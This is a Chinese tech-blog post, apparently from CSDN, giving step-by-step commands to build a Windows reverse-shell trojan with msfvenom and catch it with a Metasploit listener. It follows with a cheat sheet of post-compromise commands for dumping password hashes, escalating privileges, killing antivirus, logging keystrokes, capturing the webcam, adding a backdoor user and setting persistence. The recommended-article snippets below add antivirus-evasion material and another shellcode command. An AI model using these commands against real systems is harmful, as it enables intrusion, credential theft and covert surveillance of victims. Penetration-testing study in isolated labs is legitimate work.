生成windows执行木马程序

最新推荐文章于 2024-03-02 11:00:17 发布
最新推荐文章于 2024-03-02 11:00:17 发布
阅读量1k 收藏 9
点赞数 31
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LY2761800075/article/details/136256702
版权

一、生成windows执行木马程序

在这里插入图片描述

-p windows/x64/meterpreter/reverse_tcp    //载入64位payload攻击载荷,如需32位把x64去掉即可

lhost=192.168.2.129                                   //设置本机kali的IP地址

lport=6666                                                   //设置一个监听端口,可以随意,未被占用即可

-f exe                                                           //定义此文件的类型为exe

-o /home/mm.exe                                        //生成木马程序到home目录下且命名为mm.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f exe -o /home/mm.exe

二、进入msfconsole进行监听目标上线

在这里插入图片描述

msfconsole  //进入框架
use exploit/multi/handler                      //载入模块
set payload windows/meterpreter/reverse_tcp    //加载攻击负载核
set lhost 192.168.2.129                        //设置本地监听地址,和生成的木马地址一致
set lport 6666			                       //设置本地监听端口,和生成的木马地址一致
run / exploit 		                           //开始执行,等待目标上线

(https://img-blog.csdnimg.cn/direct/6c8654b303f047deb37404301fc2fdd0.png#pic_center)

三、目标运行木马

当目标运行该木马程序,kali监听成功就会变成meterpreter

在这里插入图片描述

后渗透

Post后渗透模块
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
run hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run				             #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27        #反弹时间间隔是5s 会自动连接
                                   192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389     #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
LY2761800075
关注
  • 31
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
木马/后门程序在WINNT中进程隐藏和查找的方法
11-06
 我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,查找特定进程是我们发现木马的主要方法之一(无论手动还是防火墙),随着入侵检测软件的
msf生成免杀木马
qq_56426046的博客
09-08 5372
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
简单的Msf木马免杀
weixin_47948655的博客
08-12 959
简单加密shellcode与加载器实现msf木马免杀
msf免杀木马生成
qq_66985187的博客
07-04 2276
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msf(msfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 2509
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
上文Kali Linux msf木马使用教程补充:后期渗透常用指令 赶快收藏起来
2301_79704866的博客
02-19 740
上文我们讲到了关于如何用kali Linux自带的MSN木马生成生成木马并且远控Windows平台(还不知道的朋友可以去看看我的上一篇文章)。这里大家一定要注意一下,这里的截屏后的图片会默认保存在root文件夹下面。ls #查看我们的木马所在目录中的所有文件以及主机的信息。查看键盘监听记录:keyscan_dump。
在Kali Linux下利用MSF生成木马入侵同局域网下的电脑(详细版)
孟俊宇的博客
03-02 1167
本文详细的介绍了在Kali Linux下利用MSF生成木马入侵局域网下电脑的所有命令
AhMyth远程控制手机(实践)
逍遥小哥的博客
07-12 1812
木马之所以能够控制你的手机,只是因为你在安装程序时给了程序太多的权限!所以大家多去看看手机里面的应用程序所给的权限,遇到陌生的软件尽量不要给权限。Source IP 我们配置自己的服务器(这里演示我就用我win10的ip即可 备注:公网局域网都行)功能依次是,拍照 ,控制文件,录音,查看手机所在地图,查看通迅录,发短信,查看通话记录。Source Port 是我们上一个界面配置的监听端口(我配置的是42741)这里是我们配置监听端口的界面。我用的是我这之前有的安装包。我们点击箭头指的位置。
落雪木马专杀工具(实用)
04-24
病毒运行后,在C盘program file以及windows目录下生成winlogon.exe、regedit.com等14个病毒文件,病毒文件之多比较少见,,事实上这14个不同文件名的病毒文件系同一种文件,“落雪”之名亦可能由此而来。病毒文件名...
网站恶意网页木马扫描器(WebshellScanner).zip
07-11
这个问题比较头疼的,程序是.NET 开发的,需要安装 .NET Framework,但Windows 2000、Windows XP 和 Windows 2003 默认都没有.NET 2.0 运行环境。于是利用移动飞信的原理,利用fetion的程序加载主程序,可以使主程序...
MSF(2)——各种木马的生成及简单的免杀
realmels的博客
06-11 3890
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.csdn.net/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
MSF编码+VS编译木马免杀
向阳-Y.的博客
03-16 2314
木马免杀
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境:kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
Kali渗透-MSF木马免杀技术
eli的博客
05-21 2265
前言 免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。 裸奔木马 1、在 Kali 中直接使用 Msfvenom 生成木马文件,不做任何免杀处理,如下图所示: 2、在 Kali 开启 Apache 服务,同一局域网内的 Win 10 物理主机访问木马文件,尝试下载: 3、结果 Win 10 物理主机的火
Msfvenonm生成后门木马
谢公子的博客
11-08 9518
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。 Msfvenom –p (- -payload-opti...
Metasploit(msf)系列-木马免杀
chaojixiaojingang
10-10 9225
    木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 原理:        首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。 准备: 靶    机:WinXP系统  ip:192.168.1.10...
MSF生成meterpreter及静态免杀
渗透笔记
01-26 5446
1.静态免杀 1.1编译c文件,静态免杀 1.1.1 生成shellcode 在kali命令行输入 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c -
MSF木马的免杀(三)
谢公子的博客
05-26 9024
目录 MSF木马的免杀 MSF木马的免杀 MSF下输入,生成免杀shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c 这
kali生成木马程序渗透linux系统
最新发布
05-24
其中,生成木马程序是一种常用的攻击方式。 首先,需要使用 Kali Linux 上的一个名为 Metasploit 的工具来生成木马程序。Metasploit 是一款开源的渗透测试框架,可以用于创建、测试和部署漏洞利用。 其次,需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值